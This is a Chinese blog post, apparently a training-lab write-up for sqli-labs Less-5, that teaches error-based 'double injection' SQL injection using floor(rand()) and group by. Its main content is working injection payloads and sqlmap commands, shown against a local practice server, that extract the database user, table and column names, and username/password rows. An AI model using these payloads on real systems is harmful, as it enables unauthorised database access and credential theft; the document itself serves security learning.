【SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入)

已于 2022-11-02 15:47:58 修改
阅读量454 收藏 1
点赞数
分类专栏: 漏洞学习 文章标签: sql 数据库
于 2022-10-31 20:58:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sm1918451478/article/details/127623296
版权

概念

双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入,就需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。

需要用到的函数和语句有:

1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1-2

2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2

3.count() 作用为针对查询结果条数进行计数

4.rand() 作用为生成0-1范围内的随机数 (1.括号内如果填写一个固定参数,则每次生成的随机数固定;2.使用* 运算符,可以使取值范围扩大,如 rand()*2 的取值范围为0-2)

5.group by [key]对查询结果进行分组,针对每一个key 列出一条结果。

6.group by [key]和 conut(*)联用,作用为列出所有可能的key和key的查询结果条数。

最后再介绍一种错误类型:Duplicate entry

这种错误一般发生于数据库对某一个字段有UNIQUE限制的情况下,例如某员工信息表里对身份证号字段设置的UNIQUE限制,即不能出现重复的身份证号,当我们插入一条新员工信息时,输入表中已存在的身份证号时就会报Duplicate entry错误,即重复录入。

HackBar

观察页面

注入id=1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KwvwsWoV-1667220928419)(assets/image-20221029203018-9h380jr.png)]

且正确的回显只有这么一种回显,根本没有办法得到什么有效的信息

判断注入点

注入id=1’

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CjwyupU3-1667220928421)(assets/image-20221029203116-co6fq4r.png)]​

访问报错了,但是查看报错的原因,明显跟单引号的闭合问题有关

且正确的回显只有这么一种回显,所以我们可以从利用报错的信息进行注入

判断字段数

一般再有报错回显的页面都可以利用order by来爆出字段数

?id=1’ order by 3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8yAGGM4N-1667220928422)(assets/image-20221029203823-2yob0ju.png)]​

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ox3rP3k5-1667220928423)(assets/image-20221029203903-7ejkt2d.png)]​

可以得到当前的数据表共有3个字段

爆数据库用户

?id=-1' union select 1,count(*),concat((select user()),floor(rand()*9))as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fwndQOiB-1667220928423)(assets/image-20221031202718-rjk9o5x.png)]​

爆数据库名

?id=1' union select count(*),2,concat('*',(select database()),'*',floor(rand()*2))as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2gx31FpE-1667220928424)(assets/image-20221029204450-2gj5eu4.png)]​

爆数据库的数据表

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9))as a from information_schema.tables group by a--+

爆当前数据库的第一个表

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fnGV6n9y-1667220928425)(assets/image-20221029210750-19caogv.png)]​

如果想知道还有其他什么表的话直接遍历就好了limit1,1

尝试过一次爆多个数据表,但是会报错

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MjItakKo-1667220928426)(assets/image-20221029210110-gee7gg1.png)]​

爆数据库的数据表中的列名

http://0.0.0.0:777/Less-5/?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-E4o5XnyL-1667220928427)(assets/image-20221031203438-za59fj9.png)]​

同样是只能爆出一行的数据,多了就会报错

爆数据库的数据表中的字段名

?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

遍历即可得到所有的信息

sqlmap

sqlmap -u "0.0.0.0:777/Less-5/?id=1''" -batch

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fxBZeOa0-1667220928427)(assets/image-20221031203943-ld3lxux.png)]​

爆数据库名

sqlmap -u "0.0.0.0:777/Less-5/?id=1''" -batch -dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3OG8oyW1-1667220928428)(assets/image-20221031204041-2z5kmyr.png)]​

爆数据库中的数据表

sqlmap -u "0.0.0.0:777/Less-5/?id=1" -batch -D security --tables

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EiEJL3i2-1667220928428)(assets/image-20221031204150-2i68p4s.png)]​

爆数据表的字段信息

sqlmap -u "http://0.0.0.0:777/Less-5/?id=1" -batch -T users --columns

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-imwQXCkE-1667220928429)(assets/image-20221031204235-tumt0be.png)]​

爆数据表的信息

sqlmap -u "http://0.0.0.0:777/Less-5/?id=1" -batch -D security -T users -C username,password -dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yEWlCe8I-1667220928430)(assets/image-20221031204323-p4ns1hv.png)]​

Cinnam0n
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs学习笔记(二)less 5-6 注入、布尔盲注、延时盲注
闵行小鱼塘
09-03 563
继续学习sqli-labs,本篇是less5-6
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
sqli-lab教程——1-35通关
缘木之鱼
05-08 5765
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
(手工)【sqli-labs5-6】GET方法、单引号、报错注入:基本步骤、错误注入过程
05-28 934
【报错注入+闭合】
Less 5-6(注入
老司机开代码的博客
08-03 1780
文章目录1. Less-51.1 问题描述1.2 解法一:注入破解1.2.1 注入的过程1.2.2 注入的原理(floor报错的原因)1. rand()生产随机数的原理2. floor(rand())如何分组1.3 解法二:布尔盲注2. Less-63. 小结 1. Less-5 1.1 问题描述 首先我们看一下题目 意思是考察SQL注入注入。 这里涉及到了一个关键的知识点,利用cou...
SQL注入Playload List
qq_52014772的博客
07-22 1167
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入 描述 In-band SQLi (Classic SQLi) In-band SQLi注入SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
to-single-quotes-cli:将匹配的引号转换为单引号
04-29
单引号cli 将匹配的引号转换为单引号: I "love" unicorns → I 'love' unicorns安装$ npm install --global to-single-quotes-cli用法$ to-single-quotes --help Usage $ to-single-quotes <string> $ echo ...
to-double-quotes-cli:将匹配的单引号转换为引号
04-29
$ npm install --global to-double-quotes-cli 用法 $ to-double-quotes --help Usage $ to-double-quotes <string> $ echo <string> | to-double-quotes Example $ to-double-quotes "I love 'unicorns'" I ...
基于MySQLSQL注入攻击(20191202232232).pdf
12-02
标题《基于MySQLSQL注入攻击》所涉及的知识点主要围绕SQL注入攻击的原理、防御以及在基于MySQL数据库环境下实施的攻击案例。具体来看,可以分为以下几个方面: 1. SQL注入的定义与工作原理:SQL注入攻击是一种...
to-double-quotes:将匹配的单引号转换为引号
04-29
将匹配的单引号转换为引号: I 'love' unicorns → I "love" unicorns 安装 $ npm install to-double-quotes 用法 import toDoubleQuotes from 'to-double-quotes' ; toDoubleQuotes ( 'I love \'unicorns\' "and...
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1922
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
mysql post 注入工具类_POST注入-注入
weixin_34847560的博客
01-27 194
Less-111.首先随便写一点 然后直接抓包可以看见报错了这个时候我们加个单引号,然后分析后台报错得语句可以看见我们只看见了passwd得语法问题 没有看见uname得报错 我们初衷就是要加单引号,通过报错看看uname得语法所以加一个引号看看这个时候后台报错就出来了这个时候想办法让他不报错直接admin‘# 闭合单引号可以看见不报错了然后用order by测试列数(用二分法)最后才测到是2...
渗透测试-SQL注入之二次注入
lza20001103的博客
04-21 3628
渗透测试-SQL注入之二次注入
SQL注入原理及思路(绕过)-超详细
最新发布
weixin_52501704的博客
05-17 2980
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
(白帽子学习笔记)前渗透——SQL注入
冬的博客
08-23 776
注入详解 目录 注入详解 SQL注入 SQL注入漏洞的产生必须满足两个条件: SQL注入漏洞的危害 注入判断: SQL注入: 数字字符: 布尔盲注: 时间盲注: 报错注入: 联合注入: 堆查询注入: 宽字节注入: 按注入点类 数字 字符 搜索 按执行效果类 布尔盲注 时间盲注 报错注入 宽字节注入 DNSlog外带 sqli-labs部分总结 第五关——基于'字符报错 第六关——基于"字符报错 第七关——文件读写注入 第八
sql注入——单引号注入sqli-labs-less1)
pluto_23的博客
07-22 4473
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
SQL注入攻击Single quotes单引号注入
sm1918451478的博客
10-20 1385
SQL注入攻击】GET-Error based-Single quotes-String(GET基于错误的单引号字符注入
【Godot】自动注入节点的属性工具类
qq_37280924的博客
05-16 319
自动设置唯一名称的属性节点属性,不需要再手动获取设置。
sqli-labs通关-------05lesson-double_injection_single_quotes(盲注)
枯藤闲画云
05-31 215
一进来让我们数据id 然后??? 到这来我们解释一下名词 http://www.91ri.org/7636.html 介绍一下查询注入,什么叫查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。 这种方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值